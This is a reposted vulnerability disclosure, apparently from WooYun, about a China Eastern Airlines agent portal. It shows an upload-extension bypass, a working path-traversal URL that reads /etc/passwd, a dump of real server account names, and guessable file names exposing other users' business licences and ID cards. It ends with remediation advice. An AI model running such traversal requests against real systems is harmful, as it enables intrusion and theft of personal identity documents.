神刀安全网

漏洞标题: 东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

漏洞详情

披露状态:

2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-01-27: 厂商已经确认,细节仅向厂商公开
2016-02-06: 细节向核心白帽子及相关领域专家公开
2016-02-16: 细节向普通白帽子公开
2016-02-26: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

东航叔叔修漏洞啦,任意文件下载,并且还能看其他人的资质哦~~

详细说明:

http://ceagent.ceair.com

注册

漏洞标题:  东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

此处可以上传任意类型的文件。

漏洞标题:  东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

漏洞标题:  东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

Burp抓包改后缀,上传成功,但是由于使用的post参数下载文件,文件不能被解析,只能静静的躺在服务器上了。

但是发现此处post可以改成get,而且这个get请求使用的是系统目录格式,果断猜能任意文件下载,果然成功。

code 区域
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/license_201601261734
11.php

code 区域
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd

code 区域
HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:49 GMT
Server: Apache
ETag: 1231047008
Content-Disposition: attachment;filename="passwd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 2686

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:100:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
hw:x:500:500:hw:/home/hw:/bin/bash
was7:x:3011:301::/home/was7:/bin/bash
rduser:x:2011:201::/home/rduser:/bin/bash
itimadmin:x:11014:11014::/home/itimadmin:/bin/bash
administrator:x:11016:11016::/home/administrator:/bin/bash
etdftp:x:11017:11017::/home/etdftp:/bin/bash
ora11g:x:11018:11018::/home/ora11g:/bin/bash
yxuser:x:11019:11019::/home/yxuser:/bin/bash
wang_yl:x:10001:400::/home/wang_yl:/bin/bash
zyjin:x:10002:400::/home/zyjin:/bin/bash
zhoujie:x:10003:400::/home/zhoujie:/bin/bash
apwang:x:10004:400::/home/apwang:/bin/bash
yaohy:x:10005:400::/home/yaohy:/bin/bash
huangqin:x:10006:400::/home/huangqin:/bin/bash
yongzhou:x:10007:400::/home/yongzhou:/bin/bash
yxhuang:x:10008:400::/home/yxhuang:/bin/bash
wtliu:x:10009:400::/home/wtliu:/bin/bash
zytao:x:10010:400::/home/zytao:/bin/bash
cjchen:x:10012:400::/home/cjchen:/bin/bash
jjjin:x:10013:400::/home/jjjin:/bin/bash
huanglei1:x:10014:400::/home/huanglei1:/bin/bash
zhangjinliang:x:10015:400::/home/zhangjinliang:/bin/bash
yuegao:x:10016:400::/home/yuegao:/bin/bash
observer:x:2013:201::/home/observer:/bin/bash
rdsys:x:2015:201::/home/rdsys:/bin/bash

code 区域
HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:53 GMT
Server: Apache
ETag: 1758226636
Content-Disposition: attachment;filename="httpd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 3200

#!/bin/bash
#
# httpd Startup script for the Apache HTTP Server
#
# chkconfig: - 85 15
# description: Apache is a World Wide Web server. It is used to serve /
# HTML files and CGI.
# processname: httpd
# config: /etc/httpd/conf/httpd.conf
# config: /etc/sysconfig/httpd
# pidfile: /var/run/httpd.pid

# Source function library.
. /etc/rc.d/init.d/functions

if [ -f /etc/sysconfig/httpd ]; then
. /etc/sysconfig/httpd
fi

# Start httpd in the C locale by default.
HTTPD_LANG=${HTTPD_LANG-"C"}

# This will prevent initlog from swallowing up a pass-phrase prompt if
# mod_ssl needs a pass-phrase from the user.
INITLOG_ARGS=""

# Set HTTPD=/usr/sbin/httpd.worker in /etc/sysconfig/httpd to use a server
# with the thread-based "worker" MPM; BE WARNED that some modules may not
# work correctly with a thread-based MPM; notably PHP will refuse to start.

# Path to the apachectl script, server binary, and short-form for messages.
apachectl=/usr/sbin/apachectl
httpd=${HTTPD-/usr/sbin/httpd}
prog=httpd
pidfile=${PIDFILE-/var/run/httpd.pid}
lockfile=${LOCKFILE-/var/lock/subsys/httpd}
RETVAL=0

# check for 1.3 configuration
check13 () {
CONFFILE=/etc/httpd/conf/httpd.conf
GONE="(ServerType|BindAddress|Port|AddModule|ClearModuleList|"
GONE="${GONE}AgentLog|RefererLog|RefererIgnore|FancyIndexing|"
GONE="${GONE}AccessConfig|ResourceConfig)"
if LANG=C grep -Eiq "^[[:space:]]*($GONE)" $CONFFILE; then
echo
echo 1>&2 " Apache 1.3 configuration directives found"
echo 1>&2 " please read /usr/share/doc/httpd-2.2.3/migration.html"
failure "Apache 1.3 config directives test"
echo
exit 1
fi
}

# The semantics of these two functions differ from the way apachectl does
# things -- attempting to start while running is a failure, and shutdown
# when not running is also a failure. So we just do it the way init scripts
# are expected to behave here.
start() {
echo -n $"Starting $prog: "
check13 || exit 1
LANG=$HTTPD_LANG daemon $httpd $OPTIONS
RETVAL=$?
echo
[ $RETVAL = 0 ] && touch ${lockfile}
return $RETVAL
}

# When stopping httpd a delay of >10 second is required before SIGKILLing the
# httpd parent; this gives enough time for the httpd parent to SIGKILL any
# errant children.
stop() {
echo -n $"Stopping $prog: "
killproc -d 10 $httpd
RETVAL=$?
echo
[ $RETVAL = 0 ] && rm -f ${lockfile} ${pidfile}
}
reload() {
echo -n $"Reloading $prog: "
if ! LANG=$HTTPD_LANG $httpd $OPTIONS -t >&/dev/null; then
RETVAL=$?
echo $"not reloading due to configuration syntax error"
failure $"not reloading $httpd due to configuration syntax error"
else
killproc $httpd -HUP
RETVAL=$?
fi
echo
}

# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status $httpd
RETVAL=$?
;;
restart)
stop
start
;;
condrestart)
if [ -f ${pidfile} ] ; then
stop
start
fi
;;
reload)
reload
;;
graceful|help|configtest|fullstatus)
$apachectl $@
RETVAL=$?
;;
*)
echo $"Usage: $prog {start|stop|restart|condrestart|reload|status|fullstatus|graceful|help|configtest}"
exit 1
esac

exit $RETVAL

第二个!!!

还没完,上面只是个任意文件下载,但是还没找到方法去getshell,不过看文件名

code 区域
license_20160126173411.php

文件名是用时间构造的,可以任意下载其他用户的资质信息。

这个站点应该用的人不多,就不花时间爆破了,建议修复了吧,不然BURP爆破还是能曝出来其他人的

营业执照:

法人身份证:

税务登记证:

中航协资格认可证书:

漏洞标题:  东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

漏洞证明:

修复方案:

1 文件上传要校验Content-type不要只在前端校验后缀

2 任意文件下载那个要处理一下,限制访问目录,或者过滤,或者限制访问方式。

3 其他人的资质用cookie去保护好,加权限控制,或者把文件名加个token,不要让文件名被按规律猜解

版权声明:转载请注明来源 Fencing@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 东航某处任意文件遍历并且查看其它用户资质(营业执照/法人身份证/税务登记证/ 中航协资格认可证书)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮